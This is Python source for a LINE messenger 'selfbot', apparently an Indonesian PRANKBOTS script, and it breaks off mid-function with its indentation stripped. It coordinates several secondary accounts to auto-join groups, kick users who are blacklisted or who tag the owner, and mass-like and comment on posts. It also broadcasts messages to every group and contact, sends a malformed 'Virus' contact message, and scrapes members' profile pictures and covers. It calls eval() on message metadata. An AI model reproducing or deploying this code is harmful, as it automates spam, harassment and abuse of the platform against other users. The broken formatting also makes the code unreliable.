#Getting all links with the help of '_images_get_next_image'
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item) #Append all the links in the list named 'Links'
time.sleep(0.1) #Timer could be used to slow down the request for image downloads
page = page[end_content:]
return items
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
return image
def updateProfilePicture(self, path):
file=open(path, 'rb')
files = {
'file': file
}
params = {
'name': 'media',
'type': 'image',
'oid': self.profile.mid,
'ver': '1.0',
}
data={
'params': json.dumps(params)
}
r = self.server.postContent(self.server.LINE_OBS_DOMAIN + '/talk/p/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Update profile picture failure.')
return True
def sendVideo(self, to_, path):
M = Message(to=to_, text=None, contentType = 2)
M.contentMetadata = None
M.contentPreview = None
M2 = self.Talk.client.sendMessage(0,M)
M_id = M2.id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'video',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
#print r
if r.status_code != 201:
raise Exception('Upload video failure.')
return True
def sendVideoWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download video failure.')
try:
self.sendVideo(to_, path)
except Exception as e:
raise (e)
def sendAudioWithUrl(self, to_, url):
path = '%s/pythonLine-%1.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download audio failure.')
def sendAudio(self, to_, path):
M = Message(to=to_, text=None, contentType = 3)
M.contentMetadata = None
M.contentPreview = None
M2 = self.Talk.client.sendMessage(0,M)
M_id = M2.id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'audio',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload audio failure.')
return True
try:
self.sendAudio(to_, path)
except Exception as e:
raise (e)
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def fullwidth(text):
'''converts a regular string to Unicode Fullwidth
Preconditions: text, a string'''
translator = ''
translator = translator.maketrans('0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&()*+,-./:;<=>?@[]^_`{|}~' , '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!゛#$%&()*+、ー。/:;〈=〉?@[]^_‘{|}~')
return text.translate(translator)
def sendImage(self, to_, path):
M = Message(to=to_, text=None, contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M2 = self._client.sendMessage(0,M)
M_id = M2.id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://obs-sg.line-apps.com/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except:
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def NOTIFIED_READ_MESSAGE(op):
try:
if op.param1 in wait2['readPoint']:
Name = acil.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name
wait2['ROM'][op.param1][op.param2] = "・" + Name
else:
pass
except:
pass
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
return '%02d Jam %02d Menit %02d Detik' % (hours, mins, secs)
def bot(op):
try:
if op.type == 0:
return
if op.type == 13:
if mid in op.param3:
G = acil.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
acil.rejectGroupInvitation(op.param1)
else:
acil.acceptGroupInvitation(op.param1)
G.preventJoinByTicket = False
acil.updateGroup(G)
Ticket = acil.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
acil.updateGroup(G)
else:
acil.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
acil.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace(" ",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
random.choice(KAC).kickoutFromGroup(op.param1, matched_list)
if op.type == 19:
if mid in op.param3:
wait["blacklist"][op.param2] = True
if op.type == 22:
if wait["leaveRoom"] == True:
acil.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
acil.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == mid:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
acil.acceptGroupInvitationByTicket(list_[1],list_[2])
G = acil.getGroup(list_[1])
G.preventJoinByTicket = True
acil.updateGroup(G)
except:
acil.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
acil.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
acil.like(url[25:58], url[66:], likeType=1001)
ki.like(url[25:58], url[66:], likeType=1001)
ki2.like(url[25:58], url[66:], likeType=1001)
ki3.like(url[25:58], url[66:], likeType=1001)
ki4.like(url[25:58], url[66:], likeType=1001)
ki5.like(url[25:58], url[66:], likeType=1001)
acil.comment(url[25:58], url[66:], wait["comment1"])
ki.comment(url[25:58], url[66:], wait["comment1"])
ki2.comment(url[25:58], url[66:], wait["comment1"])
ki3.comment(url[25:58], url[66:], wait["comment1"])
ki4.comment(url[25:58], url[66:], wait["comment1"])
ki5.comment(url[25:58], url[66:], wait["comment1"])
ki.comment(url[25:58], url[66:], wait["comment1"])
ki2.comment(url[25:58], url[66:], wait["comment1"])
ki3.comment(url[25:58], url[66:], wait["comment1"])
ki4.comment(url[25:58], url[66:], wait["comment1"])
ki5.comment(url[25:58], url[66:], wait["comment1"])
#-----------------------------------------------
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = acil.getGroup(op.param1)
except:
try:
G = ki1.getGroup(op.param1)
except:
try:
G = ki2.getGroup(op.param1)
except:
try:
G = ki3.getGroup(op.param1)
except:
try:
G = ki4.getGroup(op.param1)
except:
try:
G = ki5.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
acil.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
ki2.updateGroup(G)
except:
try:
ki3.updateGroup(G)
except:
try:
ki4.updateGroup(G)
except:
try:
ki5.updateGroup(G)
except:
pass
if op.param2 in Bots:
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ki2.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ki3.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ki4.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ki5.kickoutFromGroup(op.param1,[op.param2])
except:
pass
if op.type == 26:
msg = op.message
if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
ki.sendText(msg.to,text)
if op.type == 26:
msg = op.message
if msg.to in settings["simiSimi"]:
if settings["simiSimi"][msg.to] == True:
if msg.text is not None:
text = msg.text
r = requests.get("http://api.ntcorp.us/chatbot/v1/?text=" + text.replace(" ","+") + "&key=beta1.nt")
data = r.text
data = json.loads(data)
if data['status'] == 200:
if data['result']['result'] == 100:
acil.sendText(msg.to, "🤠" + data['result']['response'].encode('utf-8'))
if "MENTION" in msg.contentMetadata.keys() != None:
if wait['detectMention'] == True:
contact = acil.getContact(msg.from_)
cName = contact.pictureStatus
balas = ["http://dl.profile.line-cdn.net/" + cName]
ret_ = random.choice(balas)
mention = ast.literal_eval(msg.contentMetadata["MENTION"])
mentionees = mention["MENTIONEES"]
for mention in mentionees:
if mention["M"] in mid:
acil.sendImageWithURL(msg.to,ret_)
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
acil.sendMessage(msg)
acil.sendText(msg.to, wait["tagme"])
break
if "MENTION" in msg.contentMetadata.keys() != None:
if wait['stickerMention'] == True:
mention = ast.literal_eval(msg.contentMetadata["MENTION"])
mentionees = mention["MENTIONEES"]
for mention in mentionees:
if mention["M"] in mid:
msg.contentType = 7
msg.text = ''
msg.contentMetadata = {
'STKPKGID': 1, #stiker di tag sob
'STKTXT': '[]',
'STKVER': 100,
'STKID':110
}
acil.sendText(msg.to, wait["tagme"])
acil.sendMessage(msg)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["kickMention"] == True:
contact = acil.getContact(msg.from_)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in mid:
acil.sendText(msg.to,"don't tag me")
acil.kickoutFromGroup(msg.to,[msg.from_])
break
if msg.contentType == 13:
if wait['invite'] == True:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = acil.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
acil.sendText(msg.to, _name + " Berada DiGrup Ini")
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
acil.findAndAddContactsByMid(target)
acil.inviteIntoGroup(msg.to,[target])
acil.sendText(msg.to,"Invite " + _name)
wait['invite'] = False
break
except:
acil.sendText(msg.to,"Error")
wait['invite'] = False
break
if wait["alwayRead"] == True:
if msg.toType == 0:
acil.sendChatChecked(msg.from_,msg.id)
else:
acil.sendChatChecked(msg.to,msg.id)
# if wait["Removechat"] == True:
# if msg.toType == 0:
# acil.removeAllMessages(op.param2)
# else:
# acil.removeAllMessages(op.param2)
if msg.text in ["Botallbye"]: #asist akan keluar dari smua grup
if msg.from_ in PRANKBOT:
gid = ki.getGroupIdsJoined()
gid = ki2.getGroupIdsJoined()
gid = ki3.getGroupIdsJoined()
gid = ki4.getGroupIdsJoined()
gid = ki5.getGroupIdsJoined()
for i in gid:
ki.leaveGroup(i)
ki2.leaveGroup(i)
ki3.leaveGroup(i)
ki4.leaveGroup(i)
ki5.leaveGroup(i)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nBots Dipaksa Keluar oleh selfbot...!!!\nMakasih...!!!")
else:
acil.sendText(msg.to,"He declined all invitations")
#--------------------------
#------------------------------------------------------------
if msg.text in ["Invite:user"]:
if msg.from_ in PRANKBOT:
wait["invite"] = True
acil.sendText(msg.to,"send contact 😉")
#------------------------------------------------------------
if msg.text in ["Leaveallgroup"]: #selfbot akan keluar dari semua grup
if msg.from_ in PRANKBOT:
gid = acil.getGroupIdsJoined()
for i in gid:
acil.leaveGroup(i)
if wait["lang"] == "JP":
acil.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nBots Dipaksa Keluar oleh selfbot...!!!\nMakasih...!!!")
else:
acil.sendText(msg.to,"He declined all invitations")
#----------------------------------------------
if "Sendgrup " in msg.text:
if msg.from_ in PRANKBOT: #ini broadcast sob
bctxt = msg.text.replace("Sendgrup ", "")
n = acil.getGroupIdsJoined()
for manusia in n:
acil.sendText(manusia, (bctxt))
if "Sendcontact " in msg.text:
if msg.from_ in PRANKBOT: #SEMUA BOT AKAN BROADCAST KE SEMUA KONTAKNYA
bctxt = msg.text.replace("Sendcontact ", "")
t = ki.getAllContactIds()
t = ki2.getAllContactIds()
t = ki3.getAllContactIds()
t = ki4.getAllContactIds()
t = ki5.getAllContactIds()
for manusia in t:
ki.sendText(manusia,(bctxt))
ki2.sendText(manusia,(bctxt))
ki3.sendText(manusia,(bctxt))
ki4.sendText(manusia,(bctxt))
ki5.sendText(manusia,(bctxt))
if "Sendpm " in msg.text:
if msg.from_ in PRANKBOT: #SB AKAN BROADCAST KE SEMUA TMN NYA
bctxt = msg.text.replace("Sendpm ", "")
t = acil.getAllContactIds()
for manusia in t:
acil.sendText(manusia, (bctxt))
if "Virus" in msg.text:
if msg.from_ in PRANKBOT:
msg.contentType = 13
msg.contentMetadata = {'mid': "BEBAS,'"}
acil.sendMessage(msg)
if "Youinfo" in msg.text:
if msg.from_ in PRANKBOT:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = acil.getContact(key1)
cu = acil.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
acil.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
acil.sendText(msg.to,"Profile Picture " + contact.displayName)
acil.sendImageWithURL(msg.to,image)
acil.sendText(msg.to,"Cover " + contact.displayName)
acil.sendImageWithURL(msg.to,path)
except:
pass
if "Tagall" in msg.text:
if msg.from_ in PRANKBOT:
group = acil.getGroup(msg.to)
k = len(group.members)//100
for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*200 : (j+1)*200]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += u'@Krampus\n'
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
ki.sendMessage(msg)
if "Github " in msg.text:
if msg.from_ in PRANKBOT:
a = msg.text.replace("Github ","")
b = urllib.quote(a)
acil.sendText(msg.to,"「 Searching 」\n" "Type: GitHub Search\nStatus: Processing...")
acil.sendText(msg.to, "Title: " + a + "\nLink: https://github.com/search?utf8=✓&q="+b)
if "Playstore " in msg.text:
tob = msg.text.replace("Playstore ","")
acil.sendText(msg.to,"Please wait...")
acil.sendText(msg.to,"Title : "+tob+"\nSource : Google Play\nLinknya : https://play.google.com/store/search?q=" + tob)
acil.sendText(msg.to,"This is link aplication")
if "Wikipedia " in msg.text:
if msg.from_ in PRANKBOT:
try:
wiki = msg.text.replace("Wikipedia ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
acil.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
acil.sendText(msg.to, pesan)
except Exception as e:
acil.sendText(msg.to, str(e))
if "Twitter " in msg.text:
if msg.from_ in PRANKBOT:
a = msg.text.replace("Twitter ","")
b = urllib.quote(a)
acil.sendText(msg.to,"「 Searching 」\n" "Type:Search Info\nStatus: Processing")
acil.sendText(msg.to, "https://www.twitter.com" + b)
acil.sendText(msg.to,"「 Searching 」\n" "Type:Search Info\nStatus: Success")
if "Smule " in msg.text:
if msg.from_ in PRANKBOT:
a = msg.text.replace("Smule ","")
b = urllib.quote(a)
acil.sendText(msg.to,"Searching to id smule..")
acil.sendText(msg.to, "Nama: "+b+"\nId smule: http://smule.com/" +b)
if "Google " in msg.text:
if msg.from_ in PRANKBOT:
a = msg.text.replace("Google ","")
b = urllib.quote(a)
acil.sendText(msg.to,"Searching google..")
acil.sendText(msg.to, "Search: "+b+"\nsuccess: http://google.com/" +b)
if "Xvideos " in msg.text:
if msg.from_ in PRANKBOT:
a = msg.text.replace("Xvideos ","")
b = urllib.quote(a)
acil.sendText(msg.to,"Searching ....\n" "Type:Search Xvideos\nStatus: Processing")
acil.sendText(msg.to, "{ Xvideos search page }\n\nTitle: "+b+"\nSource : Xvideos\nhttp://xvideos.com/?k=" +b)
if "Picturl @" in msg.text:
if msg.from_ in PRANKBOT:
print "[Command]dp executing"
_name = msg.text.replace("Picturl @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
acil.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
if "Coverurl @" in msg.text:
if msg.from_ in PRANKBOT:
print "[Command]cover executing"
_name = msg.text.replace("Coverurl @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = acil.getContact(target)
cu = acil.channel.getCover(target)
path = str(cu)
acil.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
if "Setauto" == msg.text:
if msg.from_ in PRANKBOT:
acil.sendText(msg.to,helpFun)
if "Help" == msg.text:
if msg.from_ in PRANKBOT:
if wait["lang"] == "JP":
acil.sendText(msg.to,helpMessage1)
msg.contentType = 13
acil.sendText(msg.to,"MINAT PESAN VPS DAN SELFBOT SILAHKAN ADD CREATOR PRANKBOTS")
msg.contentMetadata = {'mid':'ufce863f62f40706c01fa4a3c3c4cb096'}
acil.sendMessage(msg)
else:
acil.sendText(msg.to,helpMessage1)
msg.contentType = 13
acil.sendText(msg.to,"MINAT PESAN VPS DAN SELFBOT SILAHKAN ADD CREATOR PRANKBOTS")
msg.contentMetadata = {'mid':'ufce863f62f40706c01fa4a3c3c4cb096'}
acil.sendMessage(msg)
if "Media" == msg.text:
if msg.from_ in PRANKBOT:
if wait["lang"] == "JP":
acil.sendText(msg.to,helpMedia)
msg.contentType = 13
msg.contentMetadata = {'mid':'ufce863f62f40706c01fa4a3c3c4cb096'}
acil.sendMessage(msg)
acil.sendText(msg.to,"MINAT PESAN VPS DAN SELFBOT SILAHKAN ADD CREATOR PRANKBOTS")
else:
acil.sendText(msg.to,helpMedia)
msg.contentType = 13
msg.contentMetadata = {'mid':'ufce863f62f40706c01fa4a3c3c4cb096'}
acil.sendMessage(msg)
acil.sendText(msg.to,"MINAT PESAN VPS DAN SELFBOT SILAHKAN ADD CREATOR PRANKBOTS")
if "Helpbots" == msg.text:
if msg.from_ in PRANKBOT:
if wait["lang"] == "JP":
ki.sendText(msg.to,helpself)
msg.contentType = 13
msg.contentMetadata = {'mid':'ufce863f62f40706c01fa4a3c3c4cb096'}
acil.sendMessage(msg)
acil.sendText(msg.to,"MINAT PESAN VPS DAN SELFBOT SILAHKAN ADD CREATOR PRANKBOTS")
else:
acil.sendText(msg.to,helpself)
msg.contentType = 13
msg.contentMetadata = {'mid':'ufce863f62f40706c01fa4a3c3c4cb096'}
acil.sendMessage(msg)
acil.sendText(msg.to,"MINAT PESAN VPS DAN SELFBOT SILAHKAN ADD CREATOR PRANKBOTS")
if "Settings" == msg.text:
if msg.from_ in PRANKBOT:
if wait["lang"] == "JP":
acil.sendText(msg.to,helpset)
msg.contentType = 13
msg.contentMetadata = {'mid':'ufce863f62f40706c01fa4a3c3c4cb096'}
acil.sendMessage(msg)
acil.sendText(msg.to,"MINAT PESAN VPS DAN SELFBOT SILAHKAN ADD CREATOR PRANKBOTS")
else:
acil.sendText(msg.to,helpset)
msg.contentType = 13
msg.contentMetadata = {'mid':'ufce863f62f40706c01fa4a3c3c4cb096'}
acil.sendMessage(msg)
acil.sendText(msg.to,"MINAT PESAN VPS DAN SELFBOT SILAHKAN ADD CREATOR PRANKBOTS")
if "Me" == msg.text:
if msg.from_ in PRANKBOT:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
acil.sendMessage(msg)
h = acil.getContact(msg.from_)
acil.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
if "Respon" == msg.text:
if msg.from_ in PRANKBOT:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
ki.sendText(msg.to,"AMAN TERKENDALI KOMANDAN 👮")
if "Set" == msg.text:
if msg.from_ in PRANKBOT:
md = "╔▬▬℘ґ∂ηк в❍тs▬▬╗\n║▬▬▬℘▬▬в▬▬▬║\n"
if wait["likeOn"] == True: md+="║☆║Like:ON➡️📱\n"
else: md+="║☆║Like:OFF➡️📴\n"
if wait["wcOn"] == True: md+="║☆║Welcome:ON➡️📱\n"
else: md+="║☆║Welcome:OFF➡️📴\n"
if wait["leftOn"] == True: md+="║☆║Left:ON➡️📱\n"
else: md+="║☆║Left:OFF➡️📴\n"
if wait["detectMention"] == True: md+="║☆║Respon:ON➡️📱\n"
else: md +="║☆║Respon:OFF➡️📴\n"
if wait["stickerMention"] == True: md+="║☆║Stickertag:ON➡️📱\n"
else: md +="║☆║Stickertag:OFF➡️📴\n"
if settings["simiSimi"] == True: md+="║☆║Simisimi:ON➡️📱\n"
else: md+="║☆║Simisimi:OFF➡️📴\n"
if wait["alwayRead"] == True: md+="║☆║Auto read:ON➡️📱\n"
else: md+="║☆║Auto read:OFF➡️📴\n"
if wait["Sider"] == True: md+="║☆║Sider:ON➡️📱\n"
else: md+="║☆║Sider:OFF➡️📴\n"
if wait["kickMention"] == True: md+="║☆║Notag:ON➡️📱\n"
else:md+="║☆║Notag:OFF➡️📴\n"
if wait["contact"] == True: md+="║☆║Contact:ON➡️📱\n"
else: md+="║☆║Contact:OFF➡️📴\n"
if wait["autoJoin"] == True: md+="║☆║Join:ON➡️📱\n"
else: md +="║☆║Join:OFF➡️📴\n"
if wait["autoCancel"]["on"] == True:md+="║☆║Cancel:" + str(wait["autoCancel"]["members"]) + "➡️📱\n"
else: md+= "║☆║Cancel:OFF➡️📴\n"
if wait["leaveRoom"] == True: md+="║☆║Leave:ON➡️📱\n"
else: md+="║☆║Leave:OFF➡️📴\n"
if wait["timeline"] == True: md+="║☆║Share:ON➡️📱\n"
else:md+="║☆║Share:OFF➡️📴\n"
if wait["autoAdd"] == True: md+="║☆║Add:ON➡️📱\n"
else:md+="║☆║Add:OFF➡️??\n"
if wait["commentOn"] == True: md+="║☆║Com:ON➡️📱\n"
else:md+="║☆║Com:OFF➡️📴\n║▬║❨◄▬▬▬►❩\n║☆║◄═PROTECTION═►\n║▬║▬PRANKBOTS▬╣\n"
if wait["protect"] == True: md+="║☆║Pro:ON➡️📱\n"
else:md+="║☆║Pro:OFF➡️📴\n"
if wait["linkprotect"] == True: md+="║☆║ProtectQr:ON➡️📱\n"
else:md+="║☆║ProtectQr:OFF➡️📴\n"
if wait["inviteprotect"] == True: md+="║☆║Proinvite:ON➡️📱\n"
else:md+="║☆║Proinvite:OFF➡️📴\n"
if wait["cancelprotect"] == True: md+"║☆║Procancel:ON➡️📱\n"
else:md+="║☆║Procancel:OFF➡️📴\n"
if wait["pname"] == True: md+="║☆║Namelock:ON➡️📱\n"
else: md+="║☆║Namelock:OFF➡️📴\n"
acil.sendText(msg.to,md + "║▬▬▬℘▬▬в▬▬▬║\n╚▬▬℘ґ∂ηк в❍тs▬▬╝")
if "Sider:on" in msg.text:
if msg.from_ in PRANKBOT:
del cctv['point'][msg.to]
del cctv['sidermem'][msg.to]
del cctv['cyduk'][msg.to]
pass
cctv['cyduk'][msg.to]=True
wait["Sider"] = True
acil.sendText(msg.to,"Siap On Cek Sider")
if "Sider:off" in msg.text:
if msg.from_ in PRANKBOT:
cctv['cyduk'][msg.to]=False
wait["Sider"] = False
acil.sendText(msg.to, "Cek Sider Off")
if msg.text in ["Allprotect:on"]:
if msg.from_ in PRANKBOT:
if wait["protect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Protection Enable ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["protect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Protection Enable✔")
else:
acil.sendText(msg.to,"It is already On ✔")
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Link Protection Enable ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Link Protect Enable")
else:
acil.sendText(msg.to,"It is already On ô€¨")
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Invite Protect Enable ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Invite Protect Enable")
else:
acil.sendText(msg.to,"It is already On ¨")
if msg.to in wait['pname']:
acil.sendText(msg.to,"TURN ON")
else:
acil.sendText(msg.to,"ALREADY ON")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = acil.getGroup(msg.to).name
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Cancel Protection Enable ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"already ON✔")
else:
acil.sendText(msg.to,"It is already On ✔")
#=====================================================================================
if msg.text in ["Allprotect:off"]:
if msg.from_ in PRANKBOT:
if wait["protect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Protection Disable ✔")
else:
acil.sendText(msg.to,"sudah dimatikan ✔")
else:
wait["protect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close")
else:
acil.sendText(msg.to,"It is already open ✔")
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Link Protection Disable ✖")
else:
acil.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close✖")
else:
acil.sendText(msg.to,"It is already open ✔")
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Invite Protection Disable ✖")
else:
acil.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close✖")
else:
acil.sendText(msg.to,"It is already open ✔")
if msg.to in wait['pname']:
acil.sendText(msg.to,"TURN OFF")
del wait['pname'][msg.to]
else:
acil.sendText(msg.to,"ALREADY OFF")
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Cancel Protection Disable ✖")
else:
acil.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close✖")
else:
acil.sendText(msg.to,"It is already open ✔")
#==================================================
if "Admin:add " in msg.text:
if msg.from_ in PRANKBOT:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["ACIL"][target] = True
f=codecs.open('st2__a.json','w','utf-8')
json.dump(wait["ACIL"], f, sort_keys=True, indent=4,ensure_ascii=False)
acil.sendText(msg.to,"OWNER MENAMBAHKAN ADMIN")
print "[Admin]DITAMBAHKAN"
except:
pass
if "Admin:del @" in msg.text:
if msg.from_ in PRANKBOT:
if msg.toType == 2:
print "[Admin]DIHAPUS"
_name = msg.text.replace("Admin:del @","")
_nametarget = _name.rstrip()
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Not found")
else:
for target in targets:
try:
del wait["ACIL"][target]
f=codecs.open('st2__a.json','w','utf-8')
json.dump(wait["ACIL"], f, sort_keys=True, indent=4,ensure_ascii=False)
acil.sendText(msg.to,"Target Unlocked")
except:
acil.sendText(msg.to,"Error")
if msg.text in ["Listadmin","Adminlist"]:
if wait["ACIL"] == {}:
acil.sendText(msg.to,"No user is ADMIN")
else:
mc = " 🛡️==||ADMIN||==🛡️\n"
for mi_d in wait["ACIL"]:
mc += "🗜️" +acil.getContact(mi_d).displayName + "\n"
acil.sendText(msg.to,mc)
if "Getvid @" in msg.text:
if msg.from_ in PRANKBOT:
print "[Command]dp executing"
_name = msg.text.replace("Getvid @","")
_nametarget = _name.rstrip(' ')
gs = acil.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
acil.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
